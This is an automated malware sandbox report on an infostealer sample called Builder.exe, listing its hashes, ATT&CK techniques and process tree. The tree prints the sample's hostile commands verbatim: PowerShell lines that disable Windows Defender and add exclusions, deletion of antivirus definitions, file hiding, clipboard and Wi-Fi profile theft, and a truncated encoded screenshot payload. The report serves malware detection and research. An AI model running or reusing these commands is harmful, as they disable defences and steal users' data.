b0183218deea28afc25cae8eae6bcc9e6b07555111d83051ae077fd2d23d3514

Analysis

max time kernel
31s
max time network
33s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-01-2025 20:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Builder.exe
Size

6.0MB
MD5

cf96021bd2d062e759442070fafa0cb8
SHA1

0b77a16c465c729b11024bf71c6f20b0e686ea5a
SHA256

b0183218deea28afc25cae8eae6bcc9e6b07555111d83051ae077fd2d23d3514
SHA512

0eabf4e5d10d23e56d60926b6fab6a59222c730f8a7a7a479985a26c2b78bfba1680c54cf37f57e23ff240a0c94551fad74b76b5f1554a886c464769164ec248
SSDEEP

98304:QCEtdFBCm/I5TamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RnOnAK23fX1P:QJFIm/deN/FJMIDJf0gsAGK4ROnAK2vF

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
2344	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
548	powershell.exe
4284	powershell.exe
2016	powershell.exe
2476	powershell.exe
4640	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4800	cmd.exe
4636	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1192	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe
4536	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
384	tasklist.exe
4900	tasklist.exe
544	tasklist.exe
356	tasklist.exe
1172	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2488	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00280000000461aa-21.dat	upx
behavioral1/memory/4536-25-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp	upx
behavioral1/memory/4536-30-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp	upx
behavioral1/files/0x00280000000461a8-29.dat	upx
behavioral1/files/0x002800000004619d-28.dat	upx
behavioral1/files/0x00280000000461a4-47.dat	upx
behavioral1/files/0x00280000000461a3-46.dat	upx
behavioral1/files/0x00280000000461a2-45.dat	upx
behavioral1/files/0x00280000000461a1-44.dat	upx
behavioral1/files/0x00280000000461a0-43.dat	upx
behavioral1/files/0x002800000004619f-42.dat	upx
behavioral1/memory/4536-54-0x00007FFDFEAA0000-0x00007FFDFEACD000-memory.dmp	upx
behavioral1/memory/4536-56-0x00007FFE058D0000-0x00007FFE058E9000-memory.dmp	upx
behavioral1/memory/4536-58-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp	upx
behavioral1/files/0x00280000000461ad-63.dat	upx
behavioral1/memory/4536-62-0x00007FFE01A90000-0x00007FFE01AA9000-memory.dmp	upx
behavioral1/memory/4536-60-0x00007FFDFE240000-0x00007FFDFE3B1000-memory.dmp	upx
behavioral1/files/0x00280000000461ae-59.dat	upx
behavioral1/files/0x002800000004619c-55.dat	upx
behavioral1/files/0x002800000004619e-41.dat	upx
behavioral1/files/0x00280000000461af-39.dat	upx
behavioral1/files/0x00280000000461a9-34.dat	upx
behavioral1/files/0x00280000000461a7-33.dat	upx
behavioral1/memory/4536-48-0x00007FFE07EA0000-0x00007FFE07EAF000-memory.dmp	upx
behavioral1/memory/4536-74-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp	upx
behavioral1/memory/4536-73-0x00007FFDEEFA0000-0x00007FFDEF315000-memory.dmp	upx
behavioral1/memory/4536-71-0x00007FFDFE180000-0x00007FFDFE238000-memory.dmp	upx
behavioral1/memory/4536-70-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp	upx
behavioral1/memory/4536-66-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp	upx
behavioral1/memory/4536-64-0x00007FFE07980000-0x00007FFE0798D000-memory.dmp	upx
behavioral1/memory/4536-76-0x00007FFE004A0000-0x00007FFE004B4000-memory.dmp	upx
behavioral1/memory/4536-78-0x00007FFE06F40000-0x00007FFE06F4D000-memory.dmp	upx
behavioral1/memory/4536-81-0x00007FFDFE060000-0x00007FFDFE178000-memory.dmp	upx
behavioral1/memory/4536-80-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp	upx
behavioral1/memory/4536-94-0x00007FFE01A90000-0x00007FFE01AA9000-memory.dmp	upx
behavioral1/memory/4536-124-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp	upx
behavioral1/memory/4536-195-0x00007FFDFE180000-0x00007FFDFE238000-memory.dmp	upx
behavioral1/memory/4536-226-0x00007FFDEEFA0000-0x00007FFDEF315000-memory.dmp	upx
behavioral1/memory/4536-295-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp	upx
behavioral1/memory/4536-303-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp	upx
behavioral1/memory/4536-300-0x00007FFDFE240000-0x00007FFDFE3B1000-memory.dmp	upx
behavioral1/memory/4536-294-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp	upx
behavioral1/memory/4536-299-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp	upx
behavioral1/memory/4536-343-0x00007FFDFE060000-0x00007FFDFE178000-memory.dmp	upx
behavioral1/memory/4536-353-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp	upx
behavioral1/memory/4536-356-0x00007FFE06F40000-0x00007FFE06F4D000-memory.dmp	upx
behavioral1/memory/4536-355-0x00007FFE004A0000-0x00007FFE004B4000-memory.dmp	upx
behavioral1/memory/4536-354-0x00007FFDFE180000-0x00007FFDFE238000-memory.dmp	upx
behavioral1/memory/4536-352-0x00007FFE07980000-0x00007FFE0798D000-memory.dmp	upx
behavioral1/memory/4536-351-0x00007FFE01A90000-0x00007FFE01AA9000-memory.dmp	upx
behavioral1/memory/4536-350-0x00007FFDFE240000-0x00007FFDFE3B1000-memory.dmp	upx
behavioral1/memory/4536-349-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp	upx
behavioral1/memory/4536-348-0x00007FFE058D0000-0x00007FFE058E9000-memory.dmp	upx
behavioral1/memory/4536-347-0x00007FFDFEAA0000-0x00007FFDFEACD000-memory.dmp	upx
behavioral1/memory/4536-346-0x00007FFE07EA0000-0x00007FFE07EAF000-memory.dmp	upx
behavioral1/memory/4536-345-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp	upx
behavioral1/memory/4536-344-0x00007FFDEEFA0000-0x00007FFDEF315000-memory.dmp	upx
behavioral1/memory/4536-329-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1976	PING.EXE
2324	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
60	cmd.exe
2812	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3376	WMIC.exe
1016	WMIC.exe
3912	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4696	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1976	PING.EXE

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
548	powershell.exe
4640	powershell.exe
4640	powershell.exe
548	powershell.exe
4312	WMIC.exe
4312	WMIC.exe
4312	WMIC.exe
4312	WMIC.exe
3376	WMIC.exe
3376	WMIC.exe
3376	WMIC.exe
3376	WMIC.exe
1016	WMIC.exe
1016	WMIC.exe
1016	WMIC.exe
1016	WMIC.exe
2476	powershell.exe
2476	powershell.exe
3436	WMIC.exe
3436	WMIC.exe
3436	WMIC.exe
3436	WMIC.exe
4636	powershell.exe
4636	powershell.exe
4360	powershell.exe
4360	powershell.exe
4636	powershell.exe
4360	powershell.exe
4284	powershell.exe
4284	powershell.exe
1976	powershell.exe
1976	powershell.exe
1884	WMIC.exe
1884	WMIC.exe
1884	WMIC.exe
1884	WMIC.exe
2000	WMIC.exe
2000	WMIC.exe
2000	WMIC.exe
2000	WMIC.exe
2972	WMIC.exe
2972	WMIC.exe
2972	WMIC.exe
2972	WMIC.exe
2016	powershell.exe
2016	powershell.exe
3912	WMIC.exe
3912	WMIC.exe
3912	WMIC.exe
3912	WMIC.exe
2228	powershell.exe
2228	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	544	tasklist.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeIncreaseQuotaPrivilege	4312	WMIC.exe
Token: SeSecurityPrivilege	4312	WMIC.exe
Token: SeTakeOwnershipPrivilege	4312	WMIC.exe
Token: SeLoadDriverPrivilege	4312	WMIC.exe
Token: SeSystemProfilePrivilege	4312	WMIC.exe
Token: SeSystemtimePrivilege	4312	WMIC.exe
Token: SeProfSingleProcessPrivilege	4312	WMIC.exe
Token: SeIncBasePriorityPrivilege	4312	WMIC.exe
Token: SeCreatePagefilePrivilege	4312	WMIC.exe
Token: SeBackupPrivilege	4312	WMIC.exe
Token: SeRestorePrivilege	4312	WMIC.exe
Token: SeShutdownPrivilege	4312	WMIC.exe
Token: SeDebugPrivilege	4312	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4312	WMIC.exe
Token: SeRemoteShutdownPrivilege	4312	WMIC.exe
Token: SeUndockPrivilege	4312	WMIC.exe
Token: SeManageVolumePrivilege	4312	WMIC.exe
Token: 33	4312	WMIC.exe
Token: 34	4312	WMIC.exe
Token: 35	4312	WMIC.exe
Token: 36	4312	WMIC.exe
Token: SeIncreaseQuotaPrivilege	548	powershell.exe
Token: SeSecurityPrivilege	548	powershell.exe
Token: SeTakeOwnershipPrivilege	548	powershell.exe
Token: SeLoadDriverPrivilege	548	powershell.exe
Token: SeSystemProfilePrivilege	548	powershell.exe
Token: SeSystemtimePrivilege	548	powershell.exe
Token: SeProfSingleProcessPrivilege	548	powershell.exe
Token: SeIncBasePriorityPrivilege	548	powershell.exe
Token: SeCreatePagefilePrivilege	548	powershell.exe
Token: SeBackupPrivilege	548	powershell.exe
Token: SeRestorePrivilege	548	powershell.exe
Token: SeShutdownPrivilege	548	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeSystemEnvironmentPrivilege	548	powershell.exe
Token: SeRemoteShutdownPrivilege	548	powershell.exe
Token: SeUndockPrivilege	548	powershell.exe
Token: SeManageVolumePrivilege	548	powershell.exe
Token: 33	548	powershell.exe
Token: 34	548	powershell.exe
Token: 35	548	powershell.exe
Token: 36	548	powershell.exe
Token: SeIncreaseQuotaPrivilege	4640	powershell.exe
Token: SeSecurityPrivilege	4640	powershell.exe
Token: SeTakeOwnershipPrivilege	4640	powershell.exe
Token: SeLoadDriverPrivilege	4640	powershell.exe
Token: SeSystemProfilePrivilege	4640	powershell.exe
Token: SeSystemtimePrivilege	4640	powershell.exe
Token: SeProfSingleProcessPrivilege	4640	powershell.exe
Token: SeIncBasePriorityPrivilege	4640	powershell.exe
Token: SeCreatePagefilePrivilege	4640	powershell.exe
Token: SeBackupPrivilege	4640	powershell.exe
Token: SeRestorePrivilege	4640	powershell.exe
Token: SeShutdownPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeSystemEnvironmentPrivilege	4640	powershell.exe
Token: SeRemoteShutdownPrivilege	4640	powershell.exe
Token: SeUndockPrivilege	4640	powershell.exe
Token: SeManageVolumePrivilege	4640	powershell.exe
Token: 33	4640	powershell.exe
Token: 34	4640	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 4536	2868	Builder.exe	83
PID 2868 wrote to memory of 4536	2868	Builder.exe	83
PID 4536 wrote to memory of 4356	4536	Builder.exe	84
PID 4536 wrote to memory of 4356	4536	Builder.exe	84
PID 4536 wrote to memory of 1828	4536	Builder.exe	85
PID 4536 wrote to memory of 1828	4536	Builder.exe	85
PID 4536 wrote to memory of 5096	4536	Builder.exe	86
PID 4536 wrote to memory of 5096	4536	Builder.exe	86
PID 1828 wrote to memory of 548	1828	cmd.exe	90
PID 1828 wrote to memory of 548	1828	cmd.exe	90
PID 5096 wrote to memory of 544	5096	cmd.exe	91
PID 5096 wrote to memory of 544	5096	cmd.exe	91
PID 4356 wrote to memory of 4640	4356	cmd.exe	92
PID 4356 wrote to memory of 4640	4356	cmd.exe	92
PID 4536 wrote to memory of 4044	4536	Builder.exe	94
PID 4536 wrote to memory of 4044	4536	Builder.exe	94
PID 4044 wrote to memory of 4312	4044	cmd.exe	96
PID 4044 wrote to memory of 4312	4044	cmd.exe	96
PID 4536 wrote to memory of 1672	4536	Builder.exe	180
PID 4536 wrote to memory of 1672	4536	Builder.exe	180
PID 1672 wrote to memory of 384	1672	cmd.exe	144
PID 1672 wrote to memory of 384	1672	cmd.exe	144
PID 4536 wrote to memory of 3556	4536	Builder.exe	101
PID 4536 wrote to memory of 3556	4536	Builder.exe	101
PID 3556 wrote to memory of 4056	3556	cmd.exe	103
PID 3556 wrote to memory of 4056	3556	cmd.exe	103
PID 4536 wrote to memory of 4672	4536	Builder.exe	104
PID 4536 wrote to memory of 4672	4536	Builder.exe	104
PID 4672 wrote to memory of 3376	4672	cmd.exe	106
PID 4672 wrote to memory of 3376	4672	cmd.exe	106
PID 4536 wrote to memory of 4060	4536	Builder.exe	177
PID 4536 wrote to memory of 4060	4536	Builder.exe	177
PID 4060 wrote to memory of 1016	4060	cmd.exe	109
PID 4060 wrote to memory of 1016	4060	cmd.exe	109
PID 1828 wrote to memory of 2344	1828	cmd.exe	110
PID 1828 wrote to memory of 2344	1828	cmd.exe	110
PID 4536 wrote to memory of 2488	4536	Builder.exe	112
PID 4536 wrote to memory of 2488	4536	Builder.exe	112
PID 4536 wrote to memory of 1752	4536	Builder.exe	114
PID 4536 wrote to memory of 1752	4536	Builder.exe	114
PID 2488 wrote to memory of 1816	2488	cmd.exe	178
PID 2488 wrote to memory of 1816	2488	cmd.exe	178
PID 1752 wrote to memory of 2476	1752	cmd.exe	117
PID 1752 wrote to memory of 2476	1752	cmd.exe	117
PID 4536 wrote to memory of 4896	4536	Builder.exe	118
PID 4536 wrote to memory of 4896	4536	Builder.exe	118
PID 4536 wrote to memory of 2724	4536	Builder.exe	119
PID 4536 wrote to memory of 2724	4536	Builder.exe	119
PID 4896 wrote to memory of 356	4896	cmd.exe	122
PID 4896 wrote to memory of 356	4896	cmd.exe	122
PID 2724 wrote to memory of 1172	2724	cmd.exe	123
PID 2724 wrote to memory of 1172	2724	cmd.exe	123
PID 4536 wrote to memory of 3200	4536	Builder.exe	124
PID 4536 wrote to memory of 3200	4536	Builder.exe	124
PID 4536 wrote to memory of 4800	4536	Builder.exe	126
PID 4536 wrote to memory of 4800	4536	Builder.exe	126
PID 4536 wrote to memory of 228	4536	Builder.exe	127
PID 4536 wrote to memory of 228	4536	Builder.exe	127
PID 4536 wrote to memory of 60	4536	Builder.exe	129
PID 4536 wrote to memory of 60	4536	Builder.exe	129
PID 4536 wrote to memory of 224	4536	Builder.exe	173
PID 4536 wrote to memory of 224	4536	Builder.exe	173
PID 4536 wrote to memory of 3520	4536	Builder.exe	130
PID 4536 wrote to memory of 3520	4536	Builder.exe	130

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1816	attrib.exe
3052	attrib.exe
4472	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Users\Admin\AppData\Local\Temp\Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:548
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1672
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:1816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3200
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:224
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:60
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3520
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4020
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AH